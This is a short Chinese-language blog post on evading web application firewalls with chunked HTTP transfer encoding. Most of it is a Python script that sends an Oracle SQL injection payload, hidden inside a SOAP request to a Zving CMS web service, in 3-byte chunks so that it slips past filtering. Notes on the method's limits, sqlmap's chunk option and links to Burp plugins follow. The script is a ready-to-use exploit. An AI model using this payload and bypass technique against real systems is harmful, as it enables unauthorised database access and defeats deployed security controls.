分块传输绕过 WAF
<!–more–>
基本信息
import requests
from io import BytesIO
def read_in_chunks(file_object, chunk_size=3):
while True:
data = file_object.read(chunk_size)
if not data:
break
yield data
data = r'''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.cms.zving.com">
<soapenv:Header/>
<soapenv:Body>
<web:addCatalog>
<web:in0>2</web:in0>
<web:in1>{sql}</web:in1>
<web:in2>1</web:in2>
<web:in3>1</web:in3>
</web:addCatalog>
</soapenv:Body>
</soapenv:Envelope>'''
sql = r"' or dbms_aw_xml.readawmetadata((select rawtohex(banner) from v$version where rownum=1), null) is null--"
data = BytesIO(data.format(sql=sql))
url = 'http://www.example.com/cmsservice/Services/wsdl/CmsService'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102','Content-Type': 'text/xml'}
req = requests.post(url, headers=headers,timeout=3, verify=False, data=read_in_chunks(data))
print req.content
a 关于该绕过方法的局限性, chunk 只能在 POST 方法中使用,如果是 GET 方法的注入点就无法绕过。
b 此外新版 sqlmap 已经集成了 chunk 功能, 可以通过 --chunk 指定。
https://github.com/sqlmapproject/sqlmap/pull/3536
参考资料
利用分块传输吊打所有 WAF
https://www.anquanke.com/post/id/169738
分块传输绕过 WAF 的 Burp 插件
【第8周】编写Burp分块传输插件绕WAF
link
chunk-encoded burp 插件
项目编译可以参考 http://wp.blkstone.me/2019/03/maven-basics/
https://github.com/c0ny1/chunked-coding-converter
Leave a Reply